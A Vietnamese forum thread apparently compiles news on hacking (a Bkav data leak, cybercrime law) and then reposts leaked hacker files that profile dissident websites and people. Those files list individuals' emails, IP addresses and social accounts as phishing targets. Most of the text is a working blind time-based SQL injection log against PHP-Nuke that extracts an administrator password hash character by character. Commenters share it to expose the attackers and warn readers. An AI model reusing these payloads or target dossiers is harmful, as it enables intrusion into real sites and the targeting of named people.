    Nếu anh có quyền được “tuyên án”, anh sẽ “xử” những hacker tấn công vào Vietnamnet, Nguoiduatin… vừa qua tội danh gì?

    Theo luật hình sự Việt Nam, những hành vi tấn công mạng là một hình thức tội phạm. Luật hình sự mới bổ sung và sửa đổi ban hành về quy định xử phạt tội phạm công nghệ cao áp dụng từ ngày 1/1/2010, trong đó quy định rõ về các hành vi vi phạm, hacker có thể bị xử phạt tối đa đến 12 năm tù.

    Theo ý kiến cá nhân của anh thì cuộc đời của những hacker “mũ đen” sẽ đi về đâu?

    Hacker phần lớn là những người trẻ tuổi, có người vì tò mò thiếu hiểu biết mà dẫn đến các hành vi phá hoại hệ thống mạng. Có thể có những người sau đó nhận ra sai lầm, nhưng cũng có nhiều người lún sâu vào con đường tội phạm mạng chuyên nghiệp.

    Xin trân trọng cảm ơn anh!

    Ngọc Trà
    http://www.nguoiduatin.vn/khong-co-khai-niem-tan-cong-ban-a2857.html

    Hacker lại công bố hàng loạt dữ liệu “tuyệt mật” của Bkav

    Liên tiếp trong ngày hôm qua và hôm nay (9/3), một hacker tự nhận là "Mrs. Anonymous" đã công bố hàng loạt dữ liệu được cho là các thông tin nội bộ, mã nguồn thuộc loại "tuyệt mật" của công ty Bkav.

    Trong lần công bố này, hacker tiếp tục đăng tải trên một địa chỉ blog khác vừa mới được thiết lập và sử dụng một lối hành văn khác. Tuy thế, "Mrs. Anonymous" nói mình đang "tiếp tục sự nghiệp còn dang dở" tại blog cũ trên Blogspot.


    Hacker công bố nhiều dữ liệu được cho là của Bkav. Ảnh chụp màn hình.

    Theo đó, hacker này đã liên tiếp công bố 3 gói dữ liệu với tổng kích thước đã nén lên tới gần 500MB, chứa thông tin được cho là các "dự án đặc biệt", danh bạ nhân viên, tài liệu nội bộ, các mẫu biểu báo cáo,… của Bkav.

    Cùng với đó là phần mềm, mã nguồn và cơ sở dữ liệu của nhiều dự án quan trọng của Bkav, trong đó có Hệ thống hỗ trợ khách hàng (Contact Center), một số mã nguồn các môđun của Bkis/Bkav, hệ thống eGov, hệ thống và cơ sở dữ liệu eOffice,…

    Nghiêm trọng hơn, cùng với phần mềm hỗ trợ khách hàng, hacker cũng công bố dữ liệu được cho là bao gồm tên, địa chỉ, số điện thoại, email của khoảng 1 triệu khách hàng Bkav.

    Hiện chưa thể xác thực các dữ liệu trên thuộc về Bkav, xong qua đánh giá tổng thể các gói dữ liệu được gửi lên cũng như chi tiết dữ liệu trong nhiều tệp tin, chúng tôi nhận định không ít dữ liệu trong đó liên quan tới hoạt động thực tế của Bkav.

    Nếu các dữ liệu trên thực sự thuộc về Bkav thì rõ ràng đây là hành động vi phạm pháp luật nghiêm trọng và cần sớm được điều tra, xử lý nghiêm.

    Song như chúng tôi đã từng nhận định, nhóm hacker tấn công Bkav thời gian qua có khả năng bao gồm nhiều đối tượng, có kỹ năng tốt và hành động khá thận trọng, do đó có thể sự việc còn tiếp tục diễn biến phức tạp.

    Theo ICTnew
    http://m.vietgiaitri.com/cong-nghe/the-gioi-so/2012/03/hacker-lai-cong-bo-hang-loat-du-lieu-tuyet-mat-cua-bkav/

    Hình như Mac OS X, windows 7 và vista có thể chống được tấn công Zero-day

    Các bác nào có PC windows XP, nên up-to-date với service pack để có những releases cuối của XP.

    Bác Nguyễn Tử Quảng gián tiếp hỗ trợ cho hackers !

    Admin viết:
    Dân Luận được liệt kê vào danh mục "web phản động" với tập tin "danluan.org.txt" nội dung như sau:
    http://danluan.org/

    Có đăng nhập
    Có reset mật khẩu

    Sử dụng Drupal
    Có cho phép gửi bài trên web. => Rất dễ để exploit Zero-day

    http://danluanvn.blogspot.com/
    http://danluan.wordpress.com/

    Thông tin tình báo như thế này hơi bị kỹ quá :D

    Bác HG ơi, dạo này các spam bot đã tìm cách phá được captcha "làm toán" của Drupal, nên có nhiều bài viết lăng nhăng được gửi vào DL. Tôi cũng vài lần thấy hiện tượng này, nhưng vì vẫn còn trong mức kiểm soát được nên chưa muốn bật captcha khó hơn lên :D Tôi không nghĩ các "thế lực thù địch" làm trò này vì nó không xứng tầm của họ :D

    Xem ngày của các tập tin trong 1st.rar thì thấy đa phần là từ năm 2009, chỉ có vụ minhthanhjp (Minh Thành Nhật Bản) là có vẻ mới, 2011:

    minhthanhjp

    http://minhthanhjp.multiply.com
    http://vn.360plus.yahoo.com/minhthanhjp
    http://www.blogger.com/profile/08971188918295328489
    http://haminhthanhjp.blogspot.com/

    http://forum.megasharesvn.com/member.php?s=e767731eb10498352971cc5ae1ff4db9&u=65261064

    http://diendan.daitangkinhvietnam.org/viewtopic.php?f=29&t=1420&start=50
    http://nhac.conghung.com/?ch=mod:member|act:list_member|p:49

    http://vietsn.com/forum/

    http://groups.yahoo.com/group/nguyenducnguyen/message/85

    Quan hệ với
    1. Nhà văn phạm viết đào
    [email protected]
    http://vn.360plus.yahoo.com/phamvietdaonv

    2. Hồ Lan Hương

    http://pulse.yahoo.com/_MOQOOC623RVLEBWSH6GBY7CJFE/profile

    Facebook: http://vi-vn.facebook.com/people/Seiho-Tanaka/1119730881
    Bạn bè:
    [email protected]
    Dinh Thu Ha

    conghung.com
    megashare.vn
    e-thuvien.com
    daitangkinhvietnam.org
    ngoinhachung.net
    vn-zoom.com http://www.vn-zoom.com/2774515-minhthanhjp/ minhthanhjp [email protected] 60.40.21.81 JAPAN KAWASAKI Đăng ký: 15/04/2010 p3081-ipbf1504hodogaya.kanagawa.ocn.ne.jp
    webtinhoc.vn

    ??? 125.172.54.243 [email protected] Đăng ký 18-2-2010 08:51 Đăng nhập 11-3-2010 15:59 p2243-ipbf407hodogaya.kanagawa.ocn.ne.jp
    [email protected] 125.175.6.3 2011-03-29 p3003-ipbf3903hodogaya.kanagawa.ocn.ne.jp

    Can phishing:

    [email protected]

    Phishing mà họ đề cập đến ở đây là gì: Đó là gửi một email giả mạo Yahoo hoặc Google đến nạn nhân, dụ họ log in vào một trang web giả danh Yahoo hoặc Google để lấy mật khẩu họ đánh vào. Một email phishing do họ tạo gửi tới [email protected]:

    screen_shot_2012-03-09_at_19.24.38.png

    Thư này "doạ" nạn nhân rằng Google sẽ đóng tài khoản của họ nếu họ không log in để khẳng định tài khoản hợp lệ. Các bác cẩn thận nhé!

    Admin viết:
    Dân Luận được liệt kê vào danh mục "web phản động" với tập tin "danluan.org.txt" nội dung như sau:
    http://danluan.org/

    Có đăng nhập
    Có reset mật khẩu

    Sử dụng Drupal
    Có cho phép gửi bài trên web. => Rất dễ để exploit Zero-day

    http://danluanvn.blogspot.com/
    http://danluan.wordpress.com/

    Thông tin tình báo như thế này hơi bị kỹ quá :D

    Vừa rồi, có hiện tượng gửi bài spam hàng loạt lên Dân Luận, tôi xóa mỏi cả tay, he he, bác Huân cần nêu cao tinh thần cảnh giác cách mạng đề phòng các thế lực thù địch có âm mưu diễn biến "lạ".

    Nội dung của file ThongLuan.org.txt (hoá ra các bác bên Thông Luận bị hack từ đây à?):

    Warning: fopen(/tmp/sess_lg797b20c5b8341787b8817a6341f002) [function.fopen]: failed to open stream: Permission denied in /home/danguyen/public_html/vn/admin.php on line 21
    ============================================================
    WHOIS
    ------------------------------------------------------------
    Email: [email protected]
    ============================================================
    PROFILES
    ------------------------------------------------------------
    Email: [email protected]
    Name: Dang
    Sex: Male
    Boston, Massachusetts
    Nguon: http://profiles.yahoo.com/un9ha

    Name: dangnguyen
    Nguon: PHP error

    [email protected]
    [email protected]

    ============================================================

    Update 31/08/2010:
    Whois:
    Registrant Email: đã được private tại networksolutionprivateregistration.com

    [email protected]
    [email protected]

    [email protected]

    List thư mục
    http://www.thongluan.org/cms/html_tq/

    Lấy fullpath bằng cách:
    http://thongluan.org/vn/themes/NukeNews/theme.php
    => /home/danguyen/public_html/vn/themes/NukeNews/theme.php

    Khai thac Blind SQL loi Youaccount. Nhuwng khong thanh cong

    check_num=' UNION/**/ SELECT IF(SUBSTRING(pwd,1,1) > CHAR(80),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1

    Loi moi tim ra
    http://localhost/PHP-Nuke-8.0/html/modules.php?name=Downloads
    d_op=Add&url='/**/UnIoN SELECT IF(SUBSTRING(pwd,1,1) > CHAR(30),sleep(6),null) FROM nuke_authors where radminsuper = '1

    http://localhost/PHP-Nuke-8.0/html/modules.php?name=News
    op=rate_complete&score=1&sid='/**/UNION SELECT CONCAT_WS(CHAR(32,58,32),`aid`,`name`,`email`,`pwd`) FROM `nuke_authors` WHERE `aid`='admin

    INSERT INTO `nuke_referer` VALUE (NULL, 'aaaaaa')

    a'+(SELECT IF(SUBSTRING(pwd,1,1) > CHAR(100),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b Sai

    a'+(SELECT IF(SUBSTRING(pwd,1,1) > CHAR(98),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI

    a'+(SELECT IF(SUBSTRING(pwd,1,1) > CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI

    a'+(SELECT IF(SUBSTRING(pwd,1,1) < CHAR(97),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b Dung

    a'+(SELECT IF(SUBSTRING(pwd,1,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG

    a'+(SELECT IF(SUBSTRING(pwd,1,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b Dung

    a'+(SELECT IF(SUBSTRING(pwd,1,1) = CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b Dung

    => 8

    a'+(SELECT IF(SUBSTRING(pwd,2,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,2,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,2,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,2,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b

    a'+(SELECT IF(SUBSTRING(pwd,2,1) = CHAR(49),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b Dung

    =>81

    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(96),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG

    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b Dung
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(64),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,3,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,3,1) = CHAR(70),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    => 81F

    a'+(SELECT IF(SUBSTRING(pwd,4,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,4,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,4,1) > CHAR(71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,4,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,4,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,4,1) = CHAR(70),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b DUNG

    => 81FF

    a'+(SELECT IF(SUBSTRING(pwd,5,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,5,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,5,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG

    a'+(SELECT IF(SUBSTRING(pwd,5,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,5,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,5,1) = CHAR(52),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    => 81FF4

    a'+(SELECT IF(SUBSTRING(pwd,6,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    a'+(SELECT IF(SUBSTRING(pwd,6,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,6,1) > CHAR(71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,6,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,6,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,6,1) = CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    => 81FF4A

    a'+(SELECT IF(SUBSTRING(pwd,1,6) = CHAR(56, 49, 70, 70, 52, 65),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b DUNG

    a'+(SELECT IF(SUBSTRING(pwd,7,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,7,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,7,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,7,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,7,1) > CHAR(48),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b SAI
    a'+(SELECT IF(SUBSTRING(pwd,7,1) = CHAR(48),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b DUNG
    =>81FF4A0

    a'+(SELECT IF(SUBSTRING(pwd,8,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,8,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,8,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,8,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,8,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,8,1) = CHAR(52),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung

    => 81FF4A04
    a'+(SELECT IF(SUBSTRING(pwd,9,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,9,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,9,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,9,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,9,1) = CHAR(50),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,10,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,10,1) = CHAR(68),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D

    a'+(SELECT IF(SUBSTRING(pwd,11,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,11,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,11,1) > CHAR(58),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,11,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,11,1) > CHAR(54),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,11,1) = CHAR(55),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D7
    a'+(SELECT IF(SUBSTRING(pwd,12,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,12,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,12,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,12,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,12,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,12,1) = CHAR(52),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D74
    a'+(SELECT IF(SUBSTRING(pwd,13,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,13,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,13,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,13,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,13,1) = CHAR(56),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(71),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,14,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,14,1) = CHAR(67),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748C
    a'+(SELECT IF(SUBSTRING(pwd,15,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,15,1) > CHAR(79),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,15,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,15,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,15,1) > CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,15,1) = CHAR(66),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB

    a'+(SELECT IF(SUBSTRING(pwd,16,1) > CHAR(64),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,16,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,16,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,16,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,16,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,16,1) = CHAR(52),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB4
    a'+(SELECT IF(SUBSTRING(pwd,17,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,17,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,17,1) > CHAR(54),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,17,1) > CHAR(55),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,17,1) = CHAR(55),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47
    a'+(SELECT IF(SUBSTRING(pwd,18,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,18,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,18,1) > CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,18,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,18,1) = CHAR(66),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47B
    a'+(SELECT IF(SUBSTRING(pwd,19,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,19,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,19,1) > CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,19,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,19,1) = CHAR(67),sleep(20),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC
    a'+(SELECT IF(SUBSTRING(pwd,20,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,20,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,20,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,20,1) > CHAR(49),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,20,1) = CHAR(50),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2
    a'+(SELECT IF(SUBSTRING(pwd,21,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,21,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,21,1) > CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,21,1) > CHAR(57),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,21,1) = CHAR(57),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC29
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(54),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(50),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(51),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,22,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,22,1) = CHAR(54),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC296
    a'+(SELECT IF(SUBSTRING(pwd,23,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,23,1) > CHAR(52),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,23,1) > CHAR(54),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,23,1) > CHAR(53),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,23,1) = CHAR(54),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966
    a'+(SELECT IF(SUBSTRING(pwd,24,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,24,1) > CHAR(67),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,24,1) > CHAR(69),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,24,1) = CHAR(70),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966F
    a'+(SELECT IF(SUBSTRING(pwd,25,1) > CHAR(56),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,25,1) > CHAR(68),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,25,1) > CHAR(66),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,25,1) > CHAR(57),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b dung
    a'+(SELECT IF(SUBSTRING(pwd,25,1) = CHAR(65),sleep(10),null) FROM nuke_authors where radminsuper = '1')+'b sai
    a'+(SELECT IF(SUBSTRING(pwd,25,1) = CHAR(66),sleep(15),null) FROM nuke_authors where radminsuper = '1')+'b dung
    => 81FF4A042D748CB47BC2966FB
